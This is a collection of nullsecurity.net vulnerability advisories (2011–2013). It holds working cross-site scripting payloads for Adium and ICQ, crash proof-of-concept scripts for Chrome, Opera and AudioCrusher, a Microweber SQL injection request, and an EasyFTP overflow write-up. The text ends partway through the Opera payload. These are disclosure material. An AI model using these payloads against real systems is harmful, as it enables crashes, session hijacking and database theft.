├── .gitignore
├── README.md
├── nullsec-adium.txt
├── nullsec-audiocrusher.txt
├── nullsec-chrome.txt
├── nullsec-easyftp.txt
├── nullsec-icq-02.txt
├── nullsec-icq.txt
├── nullsec-microwebersqli.txt
├── nullsec-opera-02.txt
├── nullsec-opera.txt
├── nullsec-skype-02.txt
├── nullsec-skype.txt
└── nullsec-worldmail.txt


/.gitignore:
--------------------------------------------------------------------------------
 1 | .swp
 2 | .swn
 3 | .swo
 4 | .key
 5 | .DS_Store
 6 | .git
 7 | .pyc
 8 | __pycache__
 9 | id_rsa
10 | id_dsa
11 | passwd
12 | shadow
13 | .bash_history
14 | .zsh_history
15 | .zhistory
16 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | About
 2 | -----
 3 | Within this section we publish some of our advisories for well known hardware
 4 | and software resources. Sometimes we include a full working exploit, sometimes
 5 | we don't. It simply depends on our mood.
 6 | 
 7 | If you find some bugs or if you have any questions, ideas or criticism regarding
 8 | to this section, feel free to message us.
 9 | 
10 | Disclaimer
11 | ----------
12 | We hereby emphasize, that the hacking related stuff on
13 | [nullsecurity.net](http://nullsecurity.net) is only for education purposes.
14 | We are not responsible for any damages. You are responsible for your own
15 | actions.
16 | 


--------------------------------------------------------------------------------
/nullsec-adium.txt:
--------------------------------------------------------------------------------
  1 | ===============================================================================
  2 | |                                                                             |
  3 |                          ____                     _ __
  4 |               ___  __ __/ / /__ ___ ______ ______(_) /___ __
  5 |              / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
  6 |             /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
  7 |                                                      /___/ team
  8 | 
  9 |                           PUBLIC SECURITY ADVISORY
 10 | |                                                                             |
 11 | ===============================================================================
 12 | 
 13 | 
 14 | TITLE
 15 | =====
 16 | 
 17 | Adium - HTML/Javascript - Cross Site Scripting Vulnerability
 18 | 
 19 | 
 20 | AUTHOR
 21 | ======
 22 | 
 23 | noptrix
 24 | 
 25 | 
 26 | DATE
 27 | ====
 28 | 
 29 | 08-02-2011
 30 | 
 31 | 
 32 | VENDOR
 33 | ======
 34 | 
 35 | Adium - http://www.adium.im/
 36 | 
 37 | 
 38 | AFFECTED PRODUCT
 39 | ================
 40 | 
 41 | Adium in version <= 1.4.2
 42 | 
 43 | 
 44 | AFFECTED PLATFORMS
 45 | ==================
 46 | 
 47 | Mac OS X (10.6.8, 10.6.7, maybe other also...)
 48 | 
 49 | 
 50 | VULNERABILITY CLASS
 51 | ===================
 52 | 
 53 | Cross Site Scripting
 54 | 
 55 | 
 56 | DESCRIPTION
 57 | ===========
 58 | 
 59 | Adium suffers from a persistent HTML/Javascript injection / Cross-Site Scripting
 60 | vulnerability due to a lack of input validation and output sanitization of
 61 | filenames.
 62 | 
 63 | 
 64 | PROOF OF CONCEPT
 65 | ================
 66 | 
 67 | The following HTML/Javascript payload can be used as a filename to trigger the
 68 | described vulnerability:
 69 | 
 70 | --- SNIP ---
 71 | 
 72 | sh3ll$ echo "123" > \"\>\<body\>\<h1\>0x90trix\ pwns\ -\ XSS\ POWER\ \<iframe\ \src\=\"www.google.com\"\ style\=\"background-color\:\ green\".gif
 73 | 
 74 | --- SNIP ---
 75 | 
 76 | For a PoC demonstration see:
 77 | 
 78 |     [+] http://www.nullsecurity.net/tmp/adium_inject.png
 79 |     [+] http://www.nullsecurity.net/tmp/adium_inject2.png
 80 |     [+] http://www.nullsecurity.net/tmp/adium_inject3.png
 81 | 
 82 | 
 83 | IMPACT
 84 | ======
 85 | 
 86 | An attacker could for example inject HTML/Javascript code and redirect/phish any
 87 | users of Adium. With some time, creativity, fantasy and good music, an attacker
 88 | could leverage the vulnerability to increase the attack vector to the underlying
 89 | software and operating system of the victim.
 90 | 
 91 | 
 92 | THREAT LEVEL
 93 | ============
 94 | 
 95 | Medium - High
 96 | 
 97 | 
 98 | STATUS
 99 | ======
100 | 
101 | Fixed.
102 | 
103 | 
104 | DISCLAIMER
105 | ==========
106 | 
107 | nullsecurity.net hereby emphasize, that the information which is published here are
108 | for education purposes only. nullsecurity.net does not take any responsibility for
109 | any abuse or misusage!
110 | 
111 |                 Copyright (c) 2011 - nullsecurity.net
112 | 


--------------------------------------------------------------------------------
/nullsec-audiocrusher.txt:
--------------------------------------------------------------------------------
 1 | ===============================================================================
 2 | |                                                                             |
 3 |                          ____                     _ __
 4 |               ___  __ __/ / /__ ___ ______ ______(_) /___ __
 5 |              / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
 6 |             /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
 7 |                                                      /___/ team
 8 | 
 9 |                           PUBLIC SECURITY ADVISORY
10 | |                                                                             |
11 | ===============================================================================
12 | 
13 | 
14 | TITLE
15 | =====
16 | 
17 | AudioCrusher Denial of Sevice PoC
18 | 
19 | 
20 | AUTHOR
21 | ======
22 | 
23 | Zy0d0x
24 | 
25 | 
26 | DATE
27 | ====
28 | 
29 | 02-11-2011
30 | 
31 | 
32 | VENDOR
33 | ======
34 | 
35 | AudioCrusher - http://www.sysdesk.de/
36 | 
37 | 
38 | AFFECTED PRODUCT
39 | ================
40 | 
41 | AudioCrusher Version 1.4
42 | 
43 | 
44 | AFFECTED PLATFORMS
45 | ==================
46 | 
47 | Windows All 
48 | 
49 | 
50 | VULNERABILITY CLASS
51 | ===================
52 | 
53 | Denail Of Service
54 | 
55 | 
56 | PROOF OF CONCEPT
57 | ================
58 | 
59 | The following python code can be used to crash the application:
60 | 
61 | --- SNIP ---
62 | buffer = "\x41" * 50000
63 | 
64 | f = open("checksum.sfv","w")
65 | f.write(buffer)
66 | f.close
67 | 
68 | print("\nFile Created\n")
69 | --- SNIP ---
70 | 
71 | 
72 | THREAT LEVEL
73 | ============
74 | 
75 | Low
76 | 
77 | 
78 | STATUS
79 | ======
80 | 
81 | Not Fixed 
82 | 
83 | 
84 | DISCLAIMER
85 | ==========
86 | 
87 | nullsecurity.net hereby emphasize, that the information which is published here are
88 | for education purposes only. nullsecurity.net does not take any responsibility for
89 | any abuse or misusage!
90 | 
91 |                 Copyright (c) 2011 - nullsecurity.net
92 | 


--------------------------------------------------------------------------------
/nullsec-chrome.txt:
--------------------------------------------------------------------------------
  1 | ===============================================================================
  2 | |                                                                             |
  3 |                          ____                     _ __
  4 |               ___  __ __/ / /__ ___ ______ ______(_) /___ __
  5 |              / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
  6 |             /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
  7 |                                                      /___/ team
  8 | 
  9 |                           PUBLIC SECURITY ADVISORY
 10 | |                                                                             |
 11 | ===============================================================================
 12 | 
 13 | 
 14 | TITLE
 15 | =====
 16 | 
 17 | Google Chrome PoC, killing process. (DoS)
 18 | 
 19 | 
 20 | AUTHOR
 21 | ======
 22 | 
 23 | pigtail23
 24 | 
 25 | 
 26 | DATE
 27 | ====
 28 | 
 29 | 10-22-2011
 30 | 
 31 | 
 32 | VENDOR
 33 | ======
 34 | 
 35 | Chrome - http://www.google.com/chrome
 36 | 
 37 | 
 38 | AFFECTED PRODUCT
 39 | ================
 40 | 
 41 | Google Chrome <= 15.0.874.106
 42 | 
 43 | 
 44 | AFFECTED PLATFORMS
 45 | ==================
 46 | 
 47 | Windows XP, Vista, 7
 48 | 
 49 | 
 50 | VULNERABILITY CLASS
 51 | ===================
 52 | 
 53 | Denial of Service
 54 | 
 55 | 
 56 | DESCRIPTION
 57 | ===========
 58 | 
 59 | It seems this is a stack overflow. No way to exploit it.
 60 | 
 61 | 
 62 | PROOF OF CONCEPT
 63 | ================
 64 | 
 65 | Python script for debugging:
 66 | 
 67 | --- SNIP ---
 68 | 
 69 | #!/usr/bin/python
 70 | 
 71 | filename = 'poc.html'
 72 | content = open('template.html', 'r').read()
 73 | 
 74 | buff = '$$*' * 36800 
 75 | 
 76 | rc = 484
 77 | content2 = content[:rc] + buff + content[rc:]	
 78 | 
 79 | FILE = open(filename,"w")
 80 | FILE.write(content2)
 81 | FILE.close()
 82 | 
 83 | 
 84 | template.html:
 85 | 
 86 | <html>
 87 | <body>
 88 | <script>(function(){var d=document;if(!("autofocus" in d.createElement("input"))){try{d.getElementById("yschsp").focus();}catch(e){}}data={"assist":{"url":"http:\/\/www.google.com","maxLength":38,"linkStem":"http:\/\/www.remoteshell.de","settingsUrl":"http:\/\/www.chrooome.xxx","strings":{"searchbox_title":"bam","settings_text":"bam","gossip_desc":"bam","scroll_up":"bam","scroll_down":"bam","aria_available_suggestions":"bam","aria_no_suggestion_available":"bam"}}};window.onload=function(){var h=d.getElementsByTagName("head")[0],o=d.createElement("script");o.src="http://www.0__o";h.appendChild(o);};}());</script>
 89 | </body>
 90 | </html>
 91 | 
 92 | --- SNIP ---
 93 | 
 94 | 
 95 | IMPACT
 96 | ======
 97 | 
 98 | You can only provoke a crash of a Google Chrome process.
 99 | 
100 | 
101 | THREAT LEVEL
102 | ============
103 | 
104 | LOW
105 | 
106 | 
107 | STATUS
108 | ======
109 | 
110 | Not fixed.
111 | 
112 | 
113 | DISCLAIMER
114 | ==========
115 | 
116 | nullsecurity.net hereby emphasize, that the information which is published here are
117 | for education purposes only. nullsecurity.net does not take any responsibility for
118 | any abuse or misusage!
119 | 
120 |                 Copyright (c) 2011 - nullsecurity.net
121 | 


--------------------------------------------------------------------------------
/nullsec-easyftp.txt:
--------------------------------------------------------------------------------
  1 | ===============================================================================
  2 | |                                                                             |
  3 |                          ____                     _ __                                
  4 |               ___  __ __/ / /__ ___ ______ ______(_) /___ __                          
  5 |              / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /                          
  6 |             /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /                           
  7 |                                                      /___/
  8 | 
  9 |                           PUBLIC SECURITY ADVISORY
 10 | |                                                                             |
 11 | ===============================================================================                  
 12 | 
 13 | 
 14 | TITLE
 15 | =====
 16 | 
 17 | EasyFTP "APPE" command buffer overflow
 18 | 
 19 | 
 20 | AUTHOR
 21 | ======
 22 | 
 23 | Original vulnerability discovery: ThE g0bL!N
 24 | Exploit: Swappage
 25 | 
 26 | NOTE:
 27 | The vulnerability in APPE command wasn't disclosed, but it's really similar to
 28 | the one present in other commands for the same FTP version, so i decided to
 29 | credit the first discovery
 30 | 
 31 | 
 32 | DATE
 33 | ====
 34 | 
 35 | 03-03-2012
 36 | 
 37 | 
 38 | AFFECTED PRODUCT
 39 | ================
 40 | 
 41 | Easy FTP Server <= 1.7.0.11
 42 | 
 43 | 
 44 | AFFECTED PLATFORMS
 45 | ==================
 46 | 
 47 | Windows XP
 48 | 
 49 | 
 50 | VULNERABILITY CLASS
 51 | ===================
 52 | 
 53 | Remote Buffer Overflow
 54 | 
 55 | 
 56 | DESCRIPTION
 57 | ===========
 58 | 
 59 | EasyFTP <= 1.7.0.11 suffers of a buffer overflow vulnerability when processing
 60 | the APPE command that can lead to remote code execution authentication is
 61 | required for this exploit to work, but EasyFTP default installation has
 62 | anonymous account
 63 | 
 64 | NOTE: i decided to work on this exploit, even if the vulnerability was already
 65 | known for self-educational reasons, i liked The buffer layout after the crash
 66 | is pretty tricky and for this reason i decided to invest some time to find a way
 67 | to expand the available buffer for the payload execution. The buffer in this
 68 | software is split in 2 parts and neither has enaugh space for it to store a
 69 | useful payload, for this reason i tried to split the shellcode in 2 parts and
 70 | apply a patch overwriting EIP after the execution flow was under control.
 71 | 
 72 | The exploit doesn't bypass NX but should be universal for all XP machines
 73 | because it doesn't rely on external OS modules to work and is completely self
 74 | contained in the binary.
 75 | 
 76 | 
 77 | PROOF OF CONCEPT / EXPLOIT
 78 | ==========================
 79 | 
 80 | [+] http://www.nullsecurity.net/tools/exploit/easyftp.py
 81 | 
 82 | 
 83 | IMPACT
 84 | ======
 85 | 
 86 | High
 87 | 
 88 | 
 89 | THREAT LEVEL
 90 | ============
 91 | 
 92 | Critical
 93 | 
 94 | 
 95 | STATUS
 96 | ======
 97 | 
 98 | Software no longer developed
 99 | 
100 | 
101 | DISCLAIMER
102 | ==========
103 | 
104 | nullsecurity.net hereby emphasize, that the information which is published here are
105 | for education purposes only. nullsecurity.net does not take any responsibility for
106 | any abuse or misusage!
107 | 
108 |                 Copyright (c) 2012 - nullsecurity.net
109 | 


--------------------------------------------------------------------------------
/nullsec-icq-02.txt:
--------------------------------------------------------------------------------
  1 | ===============================================================================
  2 | |                                                                             |
  3 |                          ____                     _ __
  4 |               ___  __ __/ / /__ ___ ______ ______(_) /___ __
  5 |              / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
  6 |             /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
  7 |                                                      /___/ team
  8 | 
  9 |                           PUBLIC SECURITY ADVISORY
 10 | |                                                                             |
 11 | ===============================================================================
 12 | 
 13 | 
 14 | TITLE
 15 | =====
 16 | 
 17 | ICQ -Remote Denial of Service Vulnerability (MUIMessage.dll)
 18 | 
 19 | 
 20 | AUTHOR
 21 | ======
 22 | 
 23 | noptrix
 24 | 
 25 | 
 26 | DATE
 27 | ====
 28 | 
 29 | 07-28-2011
 30 | 
 31 | 
 32 | VENDOR
 33 | ======
 34 | 
 35 | ICQ - http://www.icq.com/
 36 | 
 37 | 
 38 | AFFECTED PRODUCT
 39 | ================
 40 | 
 41 | ICQ Client in version <= 7.5
 42 | 
 43 | 
 44 | AFFECTED PLATFORMS
 45 | ==================
 46 | 
 47 | Windows XP, Vista, 7
 48 | 
 49 | 
 50 | VULNERABILITY CLASS
 51 | ===================
 52 | 
 53 | Remote Denial of Service
 54 | 
 55 | 
 56 | DESCRIPTION
 57 | ===========
 58 | 
 59 | ICQ suffers from a remote Denial of Service vulnerability due to a lack of input
 60 | validation, output sanitization, wrong filetype and filename handling over file
 61 | transfers.
 62 | 
 63 | 
 64 | PROOF OF CONCEPT
 65 | ================
 66 | 
 67 | The following file and payload can be used to trigger the described
 68 | vulnerability (send to victim as file):
 69 | 
 70 | --- SNIP ---
 71 | 
 72 | sh3ll$ echo "0" > \<iframe src\=\"icq.com\"\ onload\=alert\('0x90'\)\>.rtf
 73 | 
 74 | --- SNIP ---
 75 | 
 76 | Now, an attacker only needs to send this file to the victim. It will crash the
 77 | ICQ client of the victim whenever the attacker cancels the filetransfer.
 78 | Afterwards whenever the victim is trying to send a message to the attacker, it
 79 | will crash after a few seconds...
 80 | So this could be a "Cross-Site Scripting leading to Denial of Service"? :)
 81 | 
 82 | For a PoC demonstration see:
 83 | 
 84 |     [+] http://www.youtube.com/watch?v=7I1JNUWLeec
 85 | 
 86 | 
 87 | IMPACT
 88 | ======
 89 | 
 90 | An attacker could trivially crash ICQ clients of remote users without victims
 91 | interaction.
 92 | 
 93 | 
 94 | THREAT LEVEL
 95 | ============
 96 | 
 97 | Medium
 98 | 
 99 | 
100 | STATUS
101 | ======
102 | 
103 | Fixed.
104 | 
105 | 
106 | DISCLAIMER
107 | ==========
108 | 
109 | nullsecurity.net hereby emphasize, that the information which is published here are
110 | for education purposes only. nullsecurity.net does not take any responsibility for
111 | any abuse or misusage!
112 | 
113 |                 Copyright (c) 2011 - nullsecurity.net
114 | 


--------------------------------------------------------------------------------
/nullsec-icq.txt:
--------------------------------------------------------------------------------
  1 | ===============================================================================
  2 | |                                                                             |
  3 |                          ____                     _ __
  4 |               ___  __ __/ / /__ ___ ______ ______(_) /___ __
  5 |              / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
  6 |             /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
  7 |                                                      /___/ team
  8 | 
  9 |                           PUBLIC SECURITY ADVISORY
 10 | |                                                                             |
 11 | ===============================================================================
 12 | 
 13 | 
 14 | TITLE
 15 | ===== 
 16 | 
 17 | ICQ - Persistent Cross Site Scripting Vulnerability
 18 | 
 19 | 
 20 | AUTHOR
 21 | ======
 22 | 
 23 | noptrix
 24 | 
 25 | 
 26 | DATE
 27 | ====
 28 | 
 29 | 07-26-2011
 30 | 
 31 | 
 32 | VENDOR
 33 | ======
 34 | 
 35 | ICQ - http://www.icq.com/
 36 | 
 37 | 
 38 | AFFECTED PRODUCT
 39 | ================
 40 | 
 41 | ICQ Client in version <= 7.5
 42 | 
 43 | 
 44 | AFFECTED PLATFORMS
 45 | ==================
 46 | 
 47 | Windows XP, Vista, 7
 48 | 
 49 | 
 50 | VULNERABILITY CLASS
 51 | ===================
 52 | 
 53 | Cross Site Scripting
 54 | 
 55 | 
 56 | DESCRIPTION
 57 | ===========
 58 | 
 59 | ICQ suffers from a persistent Cross-Site Scripting vulnerability due to a lack
 60 | of input validation and output sanitization of the profile entries.
 61 | 
 62 | 
 63 | PROOF OF CONCEPT
 64 | ================
 65 | 
 66 | The following Javascript payload can be used as profile entries to trigger
 67 | the described vulnerability:
 68 | 
 69 | --- SNIP ---
 70 | 
 71 | "><iframe src=z onload=alert('xss_p0wer_lol') <
 72 | 
 73 | --- SNIP ---
 74 | 
 75 | For a PoC demonstration see:
 76 | 
 77 |     [+] http://www.nullsecurity.net/tmp/icq_cli_xss.png
 78 |     [+] http://www.nullsecurity.net/tmp/icq_cli_xss2.png
 79 | 
 80 | 
 81 | IMPACT
 82 | ======
 83 | 
 84 | An attacker could trivially hijack session IDs of remote users and leverage the
 85 | vulnerability to increase the attack vector to the underlying software and
 86 | operating system of the victim.
 87 | 
 88 | 
 89 | THREAT LEVEL
 90 | ============
 91 | 
 92 | High
 93 | 
 94 | 
 95 | STATUS
 96 | ======
 97 | 
 98 | Fixed.
 99 | 
100 | 
101 | DISCLAIMER
102 | ==========
103 | 
104 | nullsecurity.net hereby emphasize, that the information which is published here are
105 | for education purposes only. nullsecurity.net does not take any responsibility for
106 | any abuse or misusage!
107 | 
108 |                 Copyright (c) 2011 - nullsecurity.net
109 | 


--------------------------------------------------------------------------------
/nullsec-microwebersqli.txt:
--------------------------------------------------------------------------------
  1 | ===============================================================================
  2 | |                                                                             |
  3 |                          ____                     _ __
  4 |               ___  __ __/ / /__ ___ ______ ______(_) /___ __
  5 |              / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
  6 |             /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
  7 |                                                      /___/ team
  8 | 
  9 |                           PUBLIC SECURITY ADVISORY
 10 | |                                                                             |
 11 | ===============================================================================
 12 | 
 13 | 
 14 | TITLE
 15 | =====
 16 | 
 17 | Microweber Error Based SQL Injection
 18 | 
 19 | 
 20 | AUTHOR
 21 | ======
 22 | 
 23 | Zy0d0x
 24 | 
 25 | 
 26 | DATE
 27 | ====
 28 | 
 29 | 06/11/2013
 30 | 
 31 | 
 32 | VENDOR
 33 | ======
 34 | 
 35 | http://microweber.com/
 36 | 
 37 | 
 38 | AFFECTED PRODUCT
 39 | ================
 40 | 
 41 | Microweber v0.905 
 42 | 
 43 | 
 44 | DESCRIPTION
 45 | ===========
 46 | 
 47 | Input passed via the "for_id" parameter is not properly sanitised before being
 48 | processed. This can be exploited to extract sensitive information from the
 49 | database(s).
 50 |  
 51 | 
 52 | PROOF OF CONCEPT
 53 | ================
 54 | 
 55 | POST /microweber/api/checkout HTTP/1.1
 56 | Host: localhost
 57 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0
 58 | Accept: */*
 59 | Accept-Language: en-US,en;q=0.5
 60 | Accept-Encoding: gzip, deflate
 61 | Proxy-Connection: keep-alive
 62 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 63 | X-Requested-With: XMLHttpRequest
 64 | Referer: http://localhost/microweber/checkout
 65 | Content-Length: 352
 66 | Cookie: last_page=checkout; mw-time3830699257=2013-11-06+10%3A11%3A31; helpinfo=false; PHPSESSID=rtip13vkbp1jrsij39ab4isui4
 67 | Pragma: no-cache
 68 | Cache-Control: no-cache
 69 | 
 70 | =1&country=&first_name=test&last_name=test&email=test&phone=test&shipping_gw=shop%2Fshipping%2Fgateways%2Fcountry&for_id=shipping-info-checkout557478767[SQLI HERE]&for=module&City=test&State=test&Zip=test&Street=test&payment_gw=shop%2Fpayments%2Fgateways%2Fpaypal
 71 | 
 72 | 
 73 | IMPACT
 74 | ======
 75 | 
 76 | Injection can result in data loss or corruption, lack of accountability, or
 77 | denial of access.  Injection can sometimes lead to complete host takeover.
 78 | 
 79 | 
 80 | THREAT LEVEL
 81 | ============
 82 | 
 83 | Critical
 84 | 
 85 | 
 86 | STATUS
 87 | ======
 88 | 
 89 | Fixed update to version 0.906
 90 | 
 91 | 
 92 | DISCLAIMER
 93 | ==========
 94 | 
 95 | nullsecurity.net hereby emphasize, that the information which is published here
 96 | are for education purposes only. nullsecurity.net does not take any
 97 | responsibility for any abuse or misusage!
 98 | 
 99 |                 Copyright (c) 2013 - nullsecurity.net
100 | 


--------------------------------------------------------------------------------
/nullsec-opera-02.txt:
--------------------------------------------------------------------------------
  1 | ===============================================================================
  2 | |                                                                             |
  3 |                          ____                     _ __
  4 |               ___  __ __/ / /__ ___ ______ ______(_) /___ __
  5 |              / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
  6 |             /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
  7 |                                                      /___/ team
  8 | 
  9 |                           PUBLIC SECURITY ADVISORY
 10 | |                                                                             |
 11 | ===============================================================================
 12 | 
 13 | 
 14 | TITLE
 15 | ===== 
 16 | 
 17 | The second Opera Denial of Service PoC (Stack Overflow)
 18 | 
 19 | 
 20 | AUTHOR
 21 | ======
 22 | 
 23 | pigtail23
 24 | 
 25 | 
 26 | DATE
 27 | ====
 28 | 
 29 | 10-20-2011
 30 | 
 31 | 
 32 | VENDOR
 33 | ======
 34 | 
 35 | Opera - http://www.opera.com/
 36 | 
 37 | 
 38 | AFFECTED PRODUCT
 39 | ================
 40 | 
 41 | Opera <= 11.52
 42 | 
 43 | 
 44 | AFFECTED PLATFORMS
 45 | ==================
 46 | 
 47 | Windows XP, Vista, 7
 48 | 
 49 | 
 50 | VULNERABILITY CLASS
 51 | ===================
 52 | 
 53 | Denial of Service
 54 | 
 55 | 
 56 | DESCRIPTION
 57 | ===========
 58 | 
 59 | It's a stack overflow. So you can't overwrite any EIP or SEH.
 60 | It seems that Opera have some Problems with replace recursion.
 61 | 
 62 | 
 63 | PROOF OF CONCEPT
 64 | ================
 65 | 
 66 | poc2.html:
 67 | 
 68 | --- SNIP ---
 69 | 
 70 | <html>
 71 | <body>
 72 | <script type="text/javascript">//<![CDATA[
 73 | function addSpacesToResults(){try{for(var b=_d.getElementsByTagName("cite"),a=0;a<b.length;a++){el=b[a];firstNode=el.firstChild.nodeName;if(el.textContent.length>40&&(firstNode=="#text"||firstNode=="STRONG"))el.innerHTML=el.innerHTML.replace(/\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]+\.]